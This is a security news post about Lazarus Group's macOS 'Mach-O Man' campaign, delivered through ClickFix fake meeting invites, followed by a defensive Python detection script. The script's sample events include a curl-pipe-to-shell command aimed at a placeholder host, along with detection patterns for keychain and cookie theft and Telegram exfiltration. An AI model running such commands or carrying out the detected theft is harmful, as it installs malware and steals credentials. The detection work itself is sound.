Just caught up on something that's been making the rounds in security circles, and it's worth paying attention to if you're in the crypto space. Researchers have confirmed that Lazarus Group—the North Korea-linked outfit behind some of the biggest crypto heists—is running a fresh macOS malware campaign. This one's called Mach-O Man, and it's being distributed through something called ClickFix, a social engineering framework that's casting a pretty wide net across both traditional businesses and crypto companies.

Here's what's actually happening: victims get what looks like a legitimate calendar invite for a Zoom or Google Meet call. Seems normal, right? But once they click through, they're prompted to run some commands that quietly pull down the malware in the background. It's clever because the victim runs the commands themselves, which bypasses a lot of the standard security controls that most people rely on. The whole thing is designed to harvest credentials, browser data, cookies, and keychain entries—basically anything valuable sitting on your machine. Once it grabs everything, it zips it up and ships it out through Telegram before deleting itself completely.

What's worth noting here is that this isn't just about crypto anymore. Lazarus has been steadily broadening its target scope over the past several months. We saw them breach Zerion back in April using AI-enhanced social engineering to grab team credentials and private keys. Before that, there was the major exchange breach in 2025 that cost $1.4 billion—still one of the largest crypto losses on record. The pattern is clear: they're getting more sophisticated and more ambitious.

The macOS angle is particularly interesting because a lot of security teams have historically focused more on Windows environments. That's left some gaps, especially around application controls and user awareness on Apple systems. Lazarus has clearly noticed this and is exploiting it.

For anyone running a crypto business or managing sensitive infrastructure, this is a wake-up call. The combination of social engineering plus credential theft remains one of the hardest attack vectors to defend against. If you're not already thinking about least-privilege access, application allowlists, and monitoring for weird download-and-execute sequences, now's the time. Also worth reviewing what data might be leaking through unexpected channels like Telegram.
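To make "monitoring for weird download-and-execute sequences" concrete, here's a small Python script that runs three detections matching the chain described above (a shell piping a download straight into an interpreter, a process tree that reads credential stores and then talks to a Telegram endpoint, and a cleanup step after the upload) over a set of process, file and network events. This is an added example, not code from the post or from any researcher or vendor: the event schema, the field names, the sample events, the `example.invalid` URL and the choice of `api.telegram.org` as the exfiltration host are all assumptions made for illustration.

```python
"""Toy detection rules for a download-and-execute, collect-and-exfiltrate chain.
Added example: the event format and the sample events below are constructed,
not real telemetry, and the exfil host list is an assumption."""
import re

# Rule 1: a shell one-liner that pipes a download straight into an interpreter,
# or evaluates the download via $(...). Constructed pattern, kept deliberately narrow.
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|zsh)\b"
    r"|\b(sh|bash|zsh)\s+-c\s+[\"']?\$\((curl|wget)\b"
)
# Rule 2: files the post calls out (keychain, browser data, cookies). Substring match on path.
SENSITIVE_MARKERS = ("/Library/Keychains/", "/Cookies", "/Login Data")
# Assumed exfiltration endpoint; extend with whatever the environment treats as unexpected.
EXFIL_HOSTS = {"api.telegram.org"}

# Constructed sample: an exec/file/net event stream like an EDR feed would produce.
SAMPLE_EVENTS = [
    {"ts": 100, "type": "exec", "pid": 501, "ppid": 400, "proc": "Terminal", "cmd": "Terminal"},
    {"ts": 101, "type": "exec", "pid": 502, "ppid": 501, "proc": "bash",
     "cmd": 'bash -c "curl -fsSL https://example.invalid/update.sh | sh"'},  # constructed URL
    {"ts": 102, "type": "exec", "pid": 503, "ppid": 502, "proc": "sh", "cmd": "sh"},
    {"ts": 103, "type": "file_read", "pid": 503, "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"ts": 104, "type": "file_read", "pid": 503,
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
    {"ts": 105, "type": "exec", "pid": 504, "ppid": 503, "proc": "zip", "cmd": "zip -r /tmp/out.zip /tmp/collect"},
    {"ts": 106, "type": "net", "pid": 503, "dst": "api.telegram.org", "port": 443},
    {"ts": 107, "type": "file_delete", "pid": 503, "path": "/tmp/out.zip"},
    # Benign noise that must not fire.
    {"ts": 200, "type": "exec", "pid": 600, "ppid": 1, "proc": "Safari", "cmd": "Safari"},
    {"ts": 201, "type": "net", "pid": 600, "dst": "www.example.com", "port": 443},
]


def build_parents(events):
    """Map pid -> ppid from exec events so we can reason about process trees."""
    return {e["pid"]: e["ppid"] for e in events if e["type"] == "exec"}


def lineage(pid, parents):
    """The pid itself plus every ancestor we have an exec record for."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return seen


def is_sensitive(path):
    return any(marker in path for marker in SENSITIVE_MARKERS)


def find_download_exec(events):
    """Rule 1: exec events whose command line downloads and immediately runs code."""
    return [e for e in events if e["type"] == "exec" and DOWNLOAD_EXEC_RE.search(e["cmd"])]


def find_collect_and_exfil(events, window=600):
    """Rule 2 + 3: a connection to an exfil host from a process tree that read
    credential stores within `window` seconds beforehand; also note whether the
    same tree deleted a file afterwards (the self-cleanup step)."""
    parents = build_parents(events)
    reads = [e for e in events if e["type"] == "file_read" and is_sensitive(e["path"])]
    findings = []
    for net in events:
        if net["type"] != "net" or net["dst"] not in EXFIL_HOSTS:
            continue
        tree = lineage(net["pid"], parents)
        prior = [r for r in reads
                 if 0 <= net["ts"] - r["ts"] <= window and lineage(r["pid"], parents) & tree]
        if not prior:
            continue
        cleanup = any(e["type"] == "file_delete" and e["ts"] > net["ts"]
                      and lineage(e["pid"], parents) & tree for e in events)
        findings.append({"pid": net["pid"], "dst": net["dst"],
                         "paths": [r["path"] for r in prior], "cleanup": cleanup})
    return findings


def analyze(events):
    """Summarise hits by pid so the output is easy to route to an alert."""
    exfil = find_collect_and_exfil(events)
    return {
        "download_exec": [e["pid"] for e in find_download_exec(events)],
        "exfil": [f["pid"] for f in exfil],
        "self_delete": [f["pid"] for f in exfil if f["cleanup"]],
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The tree check deliberately keys on a shared ancestor rather than a single pid, because the collection, compression and upload steps in the chain above happen in different child processes of the same shell; in a real deployment you would tune `window`, the host list and the sensitive-path markers to your environment, and treat a hit on rule 1 alone as worth a look even without the exfil follow-up.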

The broader takeaway: even as crypto-specific threats remain in the headlines, attackers are expanding their reach across sectors. That means the attack surface for exchanges, custodians, and infrastructure providers just keeps growing. Keep watching this space—we'll probably see new variants of this malware pop up with even more evasion tricks. The convergence of social engineering, automated credential theft, and self-deletion is becoming a real problem for defenders across the industry.
This page may contain third-party content, which is provided for information purposes only (not representations/warranties) and should not be considered as an endorsement of its views by Gate, nor as financial or professional advice. See Disclaimer for details.